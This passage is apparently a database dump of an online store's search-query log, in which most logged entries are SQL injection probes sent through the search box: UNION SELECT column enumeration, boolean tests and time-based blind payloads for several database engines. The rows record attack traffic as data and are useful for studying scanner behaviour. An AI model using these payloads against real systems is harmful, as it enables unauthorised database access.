(568, 'Search entire store here... AND 4429=DBMS_PIPE.RECEIVE_MESSAGE(CHR(107)||CHR(120)||CHR(104)||CHR(75),5)-- uPlz', 4, 1, NULL, 1, 1, 1, 0, '2023-01-07 12:28:53'),
(570, 'Search entire store here...) ORDER BY 1-- QdyN', 0, 1, NULL, 1, 1, 1, 0, '2023-01-07 12:28:58'),
(572, 'Search entire store here...) ORDER BY 2964-- AApe', 0, 1, NULL, 1, 1, 1, 0, '2023-01-07 12:29:07'),
(574, 'Search entire store here...) UNION ALL SELECT NULL-- OZxn', 3, 1, NULL, 1, 1, 1, 0, '2023-01-07 12:29:17'),
(576, 'Search entire store here...) UNION ALL SELECT NULL,NULL-- pnyG', 3, 1, NULL, 1, 1, 1, 0, '2023-01-07 12:29:30'),
(578, 'Search entire store here...) UNION ALL SELECT NULL,NULL,NULL-- NbcZ', 3, 1, NULL, 1, 1, 1, 0, '2023-01-07 12:29:46'),
(580, 'Search entire store here...) UNION ALL SELECT NULL,NULL,NULL,NULL-- djAC', 3, 1, NULL, 1, 1, 1, 0, '2023-01-07 12:29:59'),
(582, 'Search entire store here...) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- LvCg', 3, 1, NULL, 1, 1, 1, 0, '2023-01-07 12:30:12'),
(584, 'Search entire store here...) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- VRbj', 3, 1, NULL, 1, 1, 1, 0, '2023-01-07 12:30:25'),
(586, 'Search entire store here...) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- pzJL', 3, 1, NULL, 1, 1, 1, 0, '2023-01-07 12:30:37'),
(588, 'Search entire store here...) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ALYe', 3, 1, NULL, 1, 1, 1, 0, '2023-01-07 12:30:51'),
(590, 'Search entire store here...) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ZGOm', 3, 1, NULL, 1, 1, 1, 0, '2023-01-07 12:31:05'),
(592, 'Search entire store here...) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- RdFT', 3, 1, NULL, 1, 1, 1, 0, '2023-01-07 12:31:20'),
(594, 'Search entire store here... ORDER BY 1-- IdFk', 0, 1, NULL, 1, 1, 1, 0, '2023-01-07 12:31:32'),
(596, 'Search entire store here... ORDER BY 2410-- eCaZ', 0, 1, NULL, 1, 1, 1, 0, '2023-01-07 12:31:41'),
(598, 'Search entire store here... UNION ALL SELECT NULL-- vsOp', 3, 1, NULL, 1, 1, 1, 0, '2023-01-07 12:31:53'),
(600, 'Search entire store here... UNION ALL SELECT NULL,NULL-- aIaX', 3, 1, NULL, 1, 1, 1, 0, '2023-01-07 12:32:06'),
(602, 'Search entire store here... UNION ALL SELECT NULL,NULL,NULL-- xgLT', 3, 1, NULL, 1, 1, 1, 0, '2023-01-07 12:32:19'),
(604, 'Search entire store here... UNION ALL SELECT NULL,NULL,NULL,NULL-- GudQ', 3, 1, NULL, 1, 1, 1, 0, '2023-01-07 12:32:35'),
(606, '1', 0, 0, NULL, 1, 1, 1, 0, '2023-08-12 07:22:10'),
(608, 'XZdyDl86', 0, 1, NULL, 1, 1, 1, 0, '2023-08-12 07:22:19'),
(610, '1*1', 0, 4, NULL, 1, 1, 1, 0, '2023-08-12 07:22:28'),
(618, '-1 OR 2+116-116-1=0+0+0+1', 2, 1, NULL, 1, 1, 1, 0, '2023-08-12 07:22:30'),
(620, '-1 OR 3+116-116-1=0+0+0+1', 1, 1, NULL, 1, 1, 1, 0, '2023-08-12 07:22:33'),
(622, '-1 OR 3*2<(0+5+116-116)', 2, 1, NULL, 1, 1, 1, 0, '2023-08-12 07:22:34'),
(624, '1 RLIKE (SELECT (CASE WHEN (15=15) THEN 1 ELSE 0x28 END)) --', 1, 1, NULL, 1, 1, 1, 0, '2023-08-12 07:22:36'),
(626, 'if(now()=sysdate(),sleep(15),0)', 0, 19, NULL, 1, 1, 1, 0, '2025-03-08 12:30:48'),
(628, '0\'XOR(if(now()=sysdate(),sleep(15),0))XOR\'Z', 0, 19, NULL, 1, 1, 1, 0, '2025-03-08 12:31:32'),
(630, '0\"XOR(if(now()=sysdate(),sleep(15),0))XOR\"Z', 0, 19, NULL, 1, 1, 1, 0, '2025-03-08 12:32:18'),
(632, '(select(0)from(select(sleep(15)))v)/*\'+(select(0)from(select(sleep(15)))v)+\'\"+(select(0)from(select(sleep(15)))v)+\"*/', 1, 17, NULL, 1, 1, 1, 0, '2025-03-08 12:33:01'),
(634, '-1; waitfor delay \'0:0:15\' --', 0, 1, NULL, 1, 1, 1, 0, '2023-08-12 07:22:58'),
(636, '-1); waitfor delay \'0:0:15\' --', 0, 1, NULL, 1, 1, 1, 0, '2023-08-12 07:23:03'),
(638, '1 waitfor delay \'0:0:15\' --', 0, 19, NULL, 1, 1, 1, 0, '2025-03-08 12:33:42'),
(640, 'C1PJF1c2\'; waitfor delay \'0:0:15\' --', 0, 1, NULL, 1, 1, 1, 0, '2023-08-12 07:23:14'),
(642, '-5 OR 713=(SELECT 713 FROM PG_SLEEP(15))--', 2, 1, NULL, 1, 1, 1, 0, '2023-08-12 07:23:20'),
(644, '-5) OR 980=(SELECT 980 FROM PG_SLEEP(15))--', 2, 1, NULL, 1, 1, 1, 0, '2023-08-12 07:23:25'),
(646, '-1)) OR 158=(SELECT 158 FROM PG_SLEEP(15))--', 2, 1, NULL, 1, 1, 1, 0, '2023-08-12 07:23:27'),
(648, 'rFWIFIXp\' OR 489=(SELECT 489 FROM PG_SLEEP(15))--', 2, 1, NULL, 1, 1, 1, 0, '2023-08-12 07:23:32'),
(650, 'v9UcZqQi\') OR 639=(SELECT 639 FROM PG_SLEEP(15))--', 2, 1, NULL, 1, 1, 1, 0, '2023-08-12 07:23:38'),
(652, 'IvU2vwJT\')) OR 797=(SELECT 797 FROM PG_SLEEP(15))--', 2, 1, NULL, 1, 1, 1, 0, '2023-08-12 07:23:45'),
(654, '1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)', 0, 1, NULL, 1, 1, 1, 0, '2023-08-12 07:23:48'),
(656, '1\'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||\'', 0, 1, NULL, 1, 1, 1, 0, '2023-08-12 07:23:52'),
(658, '1\'\"', 0, 19, NULL, 1, 1, 1, 0, '2025-03-08 11:18:34'),
(660, '1\0????%2527%2522', 0, 19, NULL, 1, 1, 1, 0, '2025-03-08 11:18:35'),
(662, '@@LDRV4', 0, 1, NULL, 1, 1, 1, 0, '2023-08-12 07:23:58'),
(664, 'the', 1, 431, NULL, 1, 1, 1, 0, '2025-03-08 12:56:42'),
(670, 'TtJtOhv0', 0, 1, NULL, 1, 1, 1, 0, '2023-08-12 07:36:51'),
(672, 'the\' AND 2*3*8=6*8 AND \'M6AX\'=\'M6AX', 4, 133, NULL, 1, 1, 1, 0, '2023-08-12 13:11:28'),
(674, 'the\" AND 2*3*8=6*8 AND \"C5iZ\"=\"C5iZ', 2, 1, NULL, 1, 1, 1, 0, '2023-08-12 07:36:58'),
(676, 'the%\' AND 2*3*8=6*8 AND \'J03V\'!=\'J03V%', 2, 1, NULL, 1, 1, 1, 0, '2023-08-12 07:37:00'),
(678, '-1 OR 2+123-123-1=0+0+0+1', 3, 1, NULL, 1, 1, 1, 0, '2023-08-12 07:37:02'),
(680, '-1 OR 3+123-123-1=0+0+0+1', 2, 1, NULL, 1, 1, 1, 0, '2023-08-12 07:37:04'),
(682, '-1 OR 3*2<(0+5+123-123)', 3, 1, NULL, 1, 1, 1, 0, '2023-08-12 07:37:08'),
(684, 'the\' RLIKE (SELECT (CASE WHEN (133=133) THEN 1 ELSE 0x28 END)) --', 1, 1, NULL, 1, 1, 1, 0, '2023-08-12 07:37:10'),
(686, 'the\'||\'', 1, 10, NULL, 1, 1, 1, 0, '2025-03-08 12:30:01'),
(688, 'the\'|||\'', 1, 1, NULL, 1, 1, 1, 0, '2023-08-12 07:37:15'),
(700, 'YcFoOFo1\'; waitfor delay \'0:0:15\' --', 0, 1, NULL, 1, 1, 1, 0, '2023-08-12 07:37:48'),
(702, '7M0WQTOU\' OR 774=(SELECT 774 FROM PG_SLEEP(15))--', 3, 1, NULL, 1, 1, 1, 0, '2023-08-12 07:37:54'),
(704, 'gHQO6jP8\') OR 893=(SELECT 893 FROM PG_SLEEP(15))--', 3, 1, NULL, 1, 1, 1, 0, '2023-08-12 07:38:00'),
(706, 'Mr5wZqLU\')) OR 800=(SELECT 800 FROM PG_SLEEP(15))--', 3, 1, NULL, 1, 1, 1, 0, '2023-08-12 07:38:07'),
(708, 'the\'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||\'', 1, 11, NULL, 1, 1, 1, 0, '2025-03-08 12:37:20'),
(714, '@@f4j1Q', 0, 1, NULL, 1, 1, 1, 0, '2023-08-12 07:38:23'),
(828, 'zkDx8hbM', 0, 1, NULL, 1, 1, 1, 0, '2023-08-12 07:55:34'),
(830, 'the\' AND 2*3*8=6*8 AND \'9rYp\'=\'9rYp', 2, 1, NULL, 1, 1, 1, 0, '2023-08-12 07:55:36'),
(832, 'the\" AND 2*3*8=6*8 AND \"BFKk\"=\"BFKk', 2, 1, NULL, 1, 1, 1, 0, '2023-08-12 07:55:38'),
(834, 'the%\' AND 2*3*8=6*8 AND \'ApDg\'!=\'ApDg%', 2, 1, NULL, 1, 1, 1, 0, '2023-08-12 07:55:40'),
(836, '-1 OR 2+214-214-1=0+0+0+1', 3, 1, NULL, 1, 1, 1, 0, '2023-08-12 07:55:42'),
(838, '-1 OR 3+214-214-1=0+0+0+1', 2, 1, NULL, 1, 1, 1, 0, '2023-08-12 07:55:44'),
(840, '-1 OR 3*2<(0+5+214-214)', 3, 1, NULL, 1, 1, 1, 0, '2023-08-12 07:55:45'),
(842, 'the\' RLIKE (SELECT (CASE WHEN (228=228) THEN 1 ELSE 0x28 END)) --', 1, 1, NULL, 1, 1, 1, 0, '2023-08-12 07:55:48'),
(856, 'T3NoLLbs\'; waitfor delay \'0:0:15\' --', 0, 1, NULL, 1, 1, 1, 0, '2023-08-12 07:56:10'),
(858, 'VuGffwe6\' OR 517=(SELECT 517 FROM PG_SLEEP(15))--', 3, 1, NULL, 1, 1, 1, 0, '2023-08-12 07:56:15'),
(860, '1HQKEECT\') OR 571=(SELECT 571 FROM PG_SLEEP(15))--', 3, 1, NULL, 1, 1, 1, 0, '2023-08-12 07:56:21'),
(862, 'TD6hHzny\')) OR 663=(SELECT 663 FROM PG_SLEEP(15))--', 3, 1, NULL, 1, 1, 1, 0, '2023-08-12 07:56:27'),
(870, '@@YNz3q', 0, 1, NULL, 1, 1, 1, 0, '2023-08-12 07:56:38'),
(992, '6N1B53n7', 0, 1, NULL, 1, 1, 1, 0, '2023-08-12 08:27:30'),
(994, 'the\' AND 2*3*8=6*8 AND \'C6xf\'=\'C6xf', 2, 1, NULL, 1, 1, 1, 0, '2023-08-12 08:27:32'),
(996, 'the\" AND 2*3*8=6*8 AND \"f140\"=\"f140', 2, 1, NULL, 1, 1, 1, 0, '2023-08-12 08:27:37'),
(998, 'the%\' AND 2*3*8=6*8 AND \'tLPT\'!=\'tLPT%', 2, 1, NULL, 1, 1, 1, 0, '2023-08-12 08:27:41'),
(1000, '-1 OR 2+190-190-1=0+0+0+1', 3, 1, NULL, 1, 1, 1, 0, '2023-08-12 08:27:46'),
(1002, '-1 OR 3+190-190-1=0+0+0+1', 2, 1, NULL, 1, 1, 1, 0, '2023-08-12 08:27:49'),
(1004, '-1 OR 3*2<(0+5+190-190)', 3, 1, NULL, 1, 1, 1, 0, '2023-08-12 08:27:53'),
(1006, 'the\' RLIKE (SELECT (CASE WHEN (544=544) THEN 1 ELSE 0x28 END)) --', 1, 1, NULL, 1, 1, 1, 0, '2023-08-12 08:27:55'),
(1020, 'Qf9qhiBq\'; waitfor delay \'0:0:15\' --', 0, 1, NULL, 1, 1, 1, 0, '2023-08-12 08:28:27'),
(1022, 'WKsCfD6A\' OR 437=(SELECT 437 FROM PG_SLEEP(15))--', 3, 1, NULL, 1, 1, 1, 0, '2023-08-12 08:28:31'),
(1024, 'wGTGFgF0\') OR 571=(SELECT 571 FROM PG_SLEEP(15))--', 3, 1, NULL, 1, 1, 1, 0, '2023-08-12 08:28:37'),
(1026, 'Esc5zytE\')) OR 838=(SELECT 838 FROM PG_SLEEP(15))--', 3, 1, NULL, 1, 1, 1, 0, '2023-08-12 08:28:45'),
(1034, '@@xeJLn', 0, 1, NULL, 1, 1, 1, 0, '2023-08-12 08:29:01'),
(1102, 'IizFfCBs', 0, 1, NULL, 1, 1, 1, 0, '2023-08-12 09:25:31'),
(1104, 'the\' AND 2*3*8=6*8 AND \'midg\'=\'midg', 1, 1, NULL, 1, 1, 1, 0, '2023-08-12 09:25:34'),
(1106, 'the\" AND 2*3*8=6*8 AND \"Gllq\"=\"Gllq', 1, 1, NULL, 1, 1, 1, 0, '2023-08-12 09:25:38'),
(1108, 'the%\' AND 2*3*8=6*8 AND \'FMKY\'!=\'FMKY%', 1, 1, NULL, 1, 1, 1, 0, '2023-08-12 09:25:40'),
(1110, '-1 OR 2+310-310-1=0+0+0+1', 1, 1, NULL, 1, 1, 1, 0, '2023-08-12 09:25:42'),
(1112, '-1 OR 3+310-310-1=0+0+0+1', 0, 1, NULL, 1, 1, 1, 0, '2023-08-12 09:25:43'),
(1114, '-1 OR 3*2<(0+5+310-310)', 1, 1, NULL, 1, 1, 1, 0, '2023-08-12 09:25:46'),
(1116, 'the\' RLIKE (SELECT (CASE WHEN (192=192) THEN 1 ELSE 0x28 END)) --', 1, 1, NULL, 1, 1, 1, 0, '2023-08-12 09:25:47'),
(1130, 'ChWFXEMa\'; waitfor delay \'0:0:15\' --', 0, 1, NULL, 1, 1, 1, 0, '2023-08-12 09:26:26'),
(1132, 'vLfoS8eq\' OR 294=(SELECT 294 FROM PG_SLEEP(15))--', 1, 1, NULL, 1, 1, 1, 0, '2023-08-12 09:26:33'),
(1134, 'aDBOA2JH\') OR 696=(SELECT 696 FROM PG_SLEEP(15))--', 1, 1, NULL, 1, 1, 1, 0, '2023-08-12 09:26:39'),
(1136, 'hCQ5IYVm\')) OR 940=(SELECT 940 FROM PG_SLEEP(15))--', 1, 1, NULL, 1, 1, 1, 0, '2023-08-12 09:26:45'),
(1144, '@@1Il8p', 0, 1, NULL, 1, 1, 1, 0, '2023-08-12 09:26:56'),
(1196, 'DSdnqt9n', 0, 1, NULL, 1, 1, 1, 0, '2023-08-12 09:52:14'),
(1198, 'the\' AND 2*3*8=6*8 AND \'KrVs\'=\'KrVs', 2, 1, NULL, 1, 1, 1, 0, '2023-08-12 09:52:16'),
(1200, 'the\" AND 2*3*8=6*8 AND \"w4Hj\"=\"w4Hj', 2, 1, NULL, 1, 1, 1, 0, '2023-08-12 09:52:20'),
(1202, 'the%\' AND 2*3*8=6*8 AND \'DSQe\'!=\'DSQe%', 2, 1, NULL, 1, 1, 1, 0, '2023-08-12 09:52:22'),
(1204, '-1 OR 2+359-359-1=0+0+0+1', 3, 1, NULL, 1, 1, 1, 0, '2023-08-12 09:52:24'),
(1206, '-1 OR 3+359-359-1=0+0+0+1', 2, 1, NULL, 1, 1, 1, 0, '2023-08-12 09:52:25'),
(1208, '-1 OR 3*2<(0+5+359-359)', 3, 1, NULL, 1, 1, 1, 0, '2023-08-12 09:52:27'),
(1210, 'the\' RLIKE (SELECT (CASE WHEN (106=106) THEN 1 ELSE 0x28 END)) --', 1, 1, NULL, 1, 1, 1, 0, '2023-08-12 09:52:29'),
(1224, 'AT5kXV3v\'; waitfor delay \'0:0:15\' --', 0, 1, NULL, 1, 1, 1, 0, '2023-08-12 09:52:56'),
(1226, 'uy5oe8qZ\' OR 128=(SELECT 128 FROM PG_SLEEP(15))--', 3, 1, NULL, 1, 1, 1, 0, '2023-08-12 09:52:59'),
(1228, 'N6HBU4UE\') OR 977=(SELECT 977 FROM PG_SLEEP(15))--', 3, 1, NULL, 1, 1, 1, 0, '2023-08-12 09:53:03'),
(1230, '3AVcc1Mb\')) OR 448=(SELECT 448 FROM PG_SLEEP(15))--', 3, 1, NULL, 1, 1, 1, 0, '2023-08-12 09:53:07'),
(1238, '@@eOahm', 0, 1, NULL, 1, 1, 1, 0, '2023-08-12 09:53:16'),
(1301, 'MJTVzoqC', 0, 1, NULL, 1, 1, 1, 0, '2023-08-12 10:02:52'),
(1303, 'the\' AND 2*3*8=6*8 AND \'M6AX\'=\'M6AX\' AND 2*3*8=6*8 AND \'vAXz\'=\'vAXz', 4, 1, NULL, 1, 1, 1, 0, '2023-08-12 10:02:54'),
(1305, 'the\' AND 2*3*8=6*8 AND \'M6AX\'=\'M6AX\" AND 2*3*8=6*8 AND \"Ypqv\"=\"Ypqv', 4, 1, NULL, 1, 1, 1, 0, '2023-08-12 10:02:56'),
(1307, 'the\' AND 2*3*8=6*8 AND \'M6AX\'=\'M6AX%\' AND 2*3*8=6*8 AND \'8Gjh\'!=\'8Gjh%', 4, 1, NULL, 1, 1, 1, 0, '2023-08-12 10:02:58'),
(1309, '-1 OR 2+504-504-1=0+0+0+1', 5, 1, NULL, 1, 1, 1, 0, '2023-08-12 10:03:00'),
(1311, '-1 OR 3+504-504-1=0+0+0+1', 3, 1, NULL, 1, 1, 1, 0, '2023-08-12 10:03:02'),
(1313, '-1 OR 3*2<(0+5+504-504)', 5, 1, NULL, 1, 1, 1, 0, '2023-08-12 10:03:04'),
(1315, 'the\' AND 2*3*8=6*8 AND \'M6AX\'=\'M6AX\' RLIKE (SELECT (CASE WHEN (158=158) THEN 1 ELSE 0x28 END)) --', 4, 1, NULL, 1, 1, 1, 0, '2023-08-12 10:03:06'),
(1317, 'the\' AND 2*3*8=6*8 AND \'M6AX\'=\'M6AX\'||\'', 4, 4, NULL, 1, 1, 1, 0, '2023-08-12 13:11:59'),
(1328, '23707B4Y\'; waitfor delay \'0:0:15\' --', 0, 1, NULL, 1, 1, 1, 0, '2023-08-12 10:03:39'),
(1330, 'sN1s43Tt\' OR 134=(SELECT 134 FROM PG_SLEEP(15))--', 5, 1, NULL, 1, 1, 1, 0, '2023-08-12 10:03:45'),
(1332, 'zvwcdYF6\') OR 757=(SELECT 757 FROM PG_SLEEP(15))--', 5, 1, NULL, 1, 1, 1, 0, '2023-08-12 10:03:59'),
(1334, '6M0AXpRT\')) OR 224=(SELECT 224 FROM PG_SLEEP(15))--', 5, 2, NULL, 1, 1, 1, 0, '2025-01-18 02:18:04'),
(1336, 'the\' AND 2*3*8=6*8 AND \'M6AX\'=\'M6AX\'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||\'', 4, 6, NULL, 1, 1, 1, 0, '2023-08-12 13:12:39'),
(1342, '@@O1Cp5', 0, 1, NULL, 1, 1, 1, 0, '2023-08-12 10:04:20'),
(1392, 'aXphwYbo', 0, 1, NULL, 1, 1, 1, 0, '2023-08-12 11:04:13'),
(1394, 'the\' AND 2*3*8=6*8 AND \'NYQW\'=\'NYQW', 2, 1, NULL, 1, 1, 1, 0, '2023-08-12 11:04:15'),
(1396, 'the\" AND 2*3*8=6*8 AND \"HFeN\"=\"HFeN', 2, 1, NULL, 1, 1, 1, 0, '2023-08-12 11:04:22'),
(1398, 'the%\' AND 2*3*8=6*8 AND \'bpvq\'!=\'bpvq%', 2, 1, NULL, 1, 1, 1, 0, '2023-08-12 11:04:24'),
(1400, '-1 OR 2+59-59-1=0+0+0+1', 3, 1, NULL, 1, 1, 1, 0, '2023-08-12 11:04:26'),
(1402, '-1 OR 3+59-59-1=0+0+0+1', 2, 1, NULL, 1, 1, 1, 0, '2023-08-12 11:04:31'),
(1404, '-1 OR 3*2<(0+5+59-59)', 3, 1, NULL, 1, 1, 1, 0, '2023-08-12 11:04:34'),
(1406, 'the\' RLIKE (SELECT (CASE WHEN (572=572) THEN 1 ELSE 0x28 END)) --', 1, 1, NULL, 1, 1, 1, 0, '2023-08-12 11:04:38'),
(1420, 'pkfQFSnH\'; waitfor delay \'0:0:15\' --', 0, 1, NULL, 1, 1, 1, 0, '2023-08-12 11:05:15'),
(1422, '9j7dVn1z\' OR 219=(SELECT 219 FROM PG_SLEEP(15))--', 5, 2, NULL, 1, 1, 1, 0, '2024-07-27 08:29:05'),
(1424, 'Ew02dRiu\') OR 268=(SELECT 268 FROM PG_SLEEP(15))--', 3, 1, NULL, 1, 1, 1, 0, '2023-08-12 11:05:29'),
(1426, 'EEZ2gy8j\')) OR 533=(SELECT 533 FROM PG_SLEEP(15))--', 3, 1, NULL, 1, 1, 1, 0, '2023-08-12 11:05:36'),
(1434, '@@zWUYD', 0, 1, NULL, 1, 1, 1, 0, '2023-08-12 11:05:59'),
(1502, 'YdVYhbsX', 0, 1, NULL, 1, 1, 1, 0, '2023-08-12 12:09:24'),
(1504, 'the\' AND 2*3*8=6*8 AND \'x4vJ\'=\'x4vJ', 2, 1, NULL, 1, 1, 1, 0, '2023-08-12 12:09:29'),
(1506, 'the\" AND 2*3*8=6*8 AND \"0Gfh\"=\"0Gfh', 2, 1, NULL, 1, 1, 1, 0, '2023-08-12 12:09:31'),
(1508, 'the%\' AND 2*3*8=6*8 AND \'ShNj\'!=\'ShNj%', 2, 1, NULL, 1, 1, 1, 0, '2023-08-12 12:09:34'),
(1510, '-1 OR 2+887-887-1=0+0+0+1', 3, 1, NULL, 1, 1, 1, 0, '2023-08-12 12:09:36'),
(1512, '-1 OR 3+887-887-1=0+0+0+1', 2, 1, NULL, 1, 1, 1, 0, '2023-08-12 12:09:38'),
(1514, '-1 OR 3*2<(0+5+887-887)', 3, 1, NULL, 1, 1, 1, 0, '2023-08-12 12:09:40'),
(1516, 'the\' RLIKE (SELECT (CASE WHEN (910=910) THEN 1 ELSE 0x28 END)) --', 1, 1, NULL, 1, 1, 1, 0, '2023-08-12 12:09:42'),
(1530, 'e7lgjheX\'; waitfor delay \'0:0:15\' --', 0, 1, NULL, 1, 1, 1, 0, '2023-08-12 12:10:04'),
(1532, 'CvpfLLij\' OR 281=(SELECT 281 FROM PG_SLEEP(15))--', 3, 1, NULL, 1, 1, 1, 0, '2023-08-12 12:10:07'),
(1534, 'stKlXDrL\') OR 88=(SELECT 88 FROM PG_SLEEP(15))--', 3, 1, NULL, 1, 1, 1, 0, '2023-08-12 12:10:15'),
(1536, 'rHGL022M\')) OR 691=(SELECT 691 FROM PG_SLEEP(15))--', 3, 1, NULL, 1, 1, 1, 0, '2023-08-12 12:10:22'),
(1544, '@@dDuH2', 0, 1, NULL, 1, 1, 1, 0, '2023-08-12 12:10:33'),
(1674, 'VcTiHXdt', 0, 1, NULL, 1, 1, 1, 0, '2023-08-12 12:20:11'),
(1676, 'the\' AND 2*3*8=6*8 AND \'M6AX\'=\'M6AX\' AND 2*3*8=6*8 AND \'bzQq\'=\'bzQq', 2, 1, NULL, 1, 1, 1, 0, '2023-08-12 12:20:16'),
(1678, 'the\' AND 2*3*8=6*8 AND \'M6AX\'=\'M6AX\" AND 2*3*8=6*8 AND \"mtb9\"=\"mtb9', 2, 1, NULL, 1, 1, 1, 0, '2023-08-12 12:20:19'),
(1680, 'the\' AND 2*3*8=6*8 AND \'M6AX\'=\'M6AX%\' AND 2*3*8=6*8 AND \'ypwm\'!=\'ypwm%', 2, 1, NULL, 1, 1, 1, 0, '2023-08-12 12:20:21'),
(1682, 'the\' AND 2*3*8=6*8 AND \'M6AX\'=\'M6AX%\' AND 2*3*8=6*9 AND \'ypwm\'!=\'ypwm%', 2, 1, NULL, 1, 1, 1, 0, '2023-08-12 12:20:23'),
(1684, '-1 OR 2+594-594-1=0+0+0+1', 2, 1, NULL, 1, 1, 1, 0, '2023-08-12 12:20:25'),
(1686, '-1 OR 3+594-594-1=0+0+0+1', 1, 1, NULL, 1, 1, 1, 0, '2023-08-12 12:20:30'),
(1688, '-1 OR 3*2<(0+5+594-594)', 2, 1, NULL, 1, 1, 1, 0, '2023-08-12 12:20:33'),
(1690, '-1 OR 3*2>(0+5+594-594)', 2, 1, NULL, 1, 1, 1, 0, '2023-08-12 12:20:34'),
(1692, 'the\' AND 2*3*8=6*8 AND \'M6AX\'=\'M6AX\' RLIKE (SELECT (CASE WHEN (270=270) THEN 1 ELSE 0x28 END)) --', 2, 1, NULL, 1, 1, 1, 0, '2023-08-12 12:20:36'),
(1694, 'the\' AND 2*3*8=6*8 AND \'M6AX\'=\'M6AX\' RLIKE (SELECT (CASE WHEN (270=0*270) THEN 1 ELSE 0x28 END)) --', 2, 1, NULL, 1, 1, 1, 0, '2023-08-12 12:20:38'),
(1708, 'ylhtY6Eu\'; waitfor delay \'0:0:15\' --', 0, 1, NULL, 1, 1, 1, 0, '2023-08-12 12:21:09'),
(1710, 'txkVQx6z\' OR 824=(SELECT 824 FROM PG_SLEEP(15))--', 2, 1, NULL, 1, 1, 1, 0, '2023-08-12 12:21:13'),
(1712, '2KBktJLh\') OR 849=(SELECT 849 FROM PG_SLEEP(15))--', 5, 2, NULL, 1, 1, 1, 0, '2025-01-18 16:30:51'),
(1714, 'qn3aY1Lu\')) OR 765=(SELECT 765 FROM PG_SLEEP(15))--', 2, 1, NULL, 1, 1, 1, 0, '2023-08-12 12:21:20'),
(1722, '@@jlpcx', 0, 1, NULL, 1, 1, 1, 0, '2023-08-12 12:21:28'),
(1730, 'ocUqf6eH', 0, 1, NULL, 1, 1, 1, 0, '2023-08-12 12:23:22'),
(1732, 'the\' AND 2*3*8=6*8 AND \'inWY\'=\'inWY', 2, 1, NULL, 1, 1, 1, 0, '2023-08-12 12:23:24'),
(1734, 'the\" AND 2*3*8=6*8 AND \"v6KC\"=\"v6KC', 2, 1, NULL, 1, 1, 1, 0, '2023-08-12 12:23:26'),
(1736, 'the%\' AND 2*3*8=6*8 AND \'RG5G\'!=\'RG5G%', 2, 1, NULL, 1, 1, 1, 0, '2023-08-12 12:23:28'),
(1738, '-1 OR 2+446-446-1=0+0+0+1', 3, 1, NULL, 1, 1, 1, 0, '2023-08-12 12:23:29'),
(1740, '-1 OR 3+446-446-1=0+0+0+1', 2, 1, NULL, 1, 1, 1, 0, '2023-08-12 12:23:31'),
(1742, '-1 OR 3*2<(0+5+446-446)', 3, 1, NULL, 1, 1, 1, 0, '2023-08-12 12:23:33'),
(1744, 'the\' RLIKE (SELECT (CASE WHEN (473=473) THEN 1 ELSE 0x28 END)) --', 1, 1, NULL, 1, 1, 1, 0, '2023-08-12 12:23:35'),
(1758, '30O5I0Eh\'; waitfor delay \'0:0:15\' --', 0, 1, NULL, 1, 1, 1, 0, '2023-08-12 12:24:08'),
(1760, '7Mq6zToY\' OR 732=(SELECT 732 FROM PG_SLEEP(15))--', 3, 1, NULL, 1, 1, 1, 0, '2023-08-12 12:24:12'),
(1762, 'LXEDuXsp\') OR 856=(SELECT 856 FROM PG_SLEEP(15))--', 3, 1, NULL, 1, 1, 1, 0, '2023-08-12 12:24:16'),
(1764, 'S3dIcB4O\')) OR 659=(SELECT 659 FROM PG_SLEEP(15))--', 3, 1, NULL, 1, 1, 1, 0, '2023-08-12 12:24:18'),
(1772, '@@JtIe0', 0, 1, NULL, 1, 1, 1, 0, '2023-08-12 12:24:28'),
(1886, 'AYWu5Sn3', 0, 1, NULL, 1, 1, 1, 0, '2023-08-12 12:35:46'),
(1888, 'the\' AND 2*3*8=6*8 AND \'M6AX\'=\'M6AX\' AND 2*3*8=6*8 AND \'k5IJ\'=\'k5IJ', 4, 1, NULL, 1, 1, 1, 0, '2023-08-12 12:35:48'),
(1890, 'the\' AND 2*3*8=6*8 AND \'M6AX\'=\'M6AX\" AND 2*3*8=6*8 AND \"CH2D\"=\"CH2D', 4, 1, NULL, 1, 1, 1, 0, '2023-08-12 12:35:50'),
(1892, 'the\' AND 2*3*8=6*8 AND \'M6AX\'=\'M6AX%\' AND 2*3*8=6*8 AND \'vR17\'!=\'vR17%', 4, 1, NULL, 1, 1, 1, 0, '2023-08-12 12:35:52'),
(1894, '-1 OR 2+642-642-1=0+0+0+1', 5, 1, NULL, 1, 1, 1, 0, '2023-08-12 12:35:54'),
(1896, '-1 OR 3+642-642-1=0+0+0+1', 3, 1, NULL, 1, 1, 1, 0, '2023-08-12 12:35:56'),
(1898, '-1 OR 3*2<(0+5+642-642)', 5, 1, NULL, 1, 1, 1, 0, '2023-08-12 12:35:58'),
(1900, 'the\' AND 2*3*8=6*8 AND \'M6AX\'=\'M6AX\' RLIKE (SELECT (CASE WHEN (841=841) THEN 1 ELSE 0x28 END)) --', 4, 1, NULL, 1, 1, 1, 0, '2023-08-12 12:36:00'),
(1914, 'bFWNg0Z1\'; waitfor delay \'0:0:15\' --', 0, 1, NULL, 1, 1, 1, 0, '2023-08-12 12:36:16'),
(1916, 'k9BbKZNI\' OR 418=(SELECT 418 FROM PG_SLEEP(15))--', 5, 1, NULL, 1, 1, 1, 0, '2023-08-12 12:36:18'),
(1918, 'bfiY4BMA\') OR 458=(SELECT 458 FROM PG_SLEEP(15))--', 5, 1, NULL, 1, 1, 1, 0, '2023-08-12 12:36:20'),
(1920, 'ZUBVM5F3\')) OR 52=(SELECT 52 FROM PG_SLEEP(15))--', 5, 1, NULL, 1, 1, 1, 0, '2023-08-12 12:36:22'),
(1928, '@@aaoHh', 0, 1, NULL, 1, 1, 1, 0, '2023-08-12 12:36:28'),
(2062, 'IYvR16wf', 0, 1, NULL, 1, 1, 1, 0, '2023-08-12 12:39:47'),
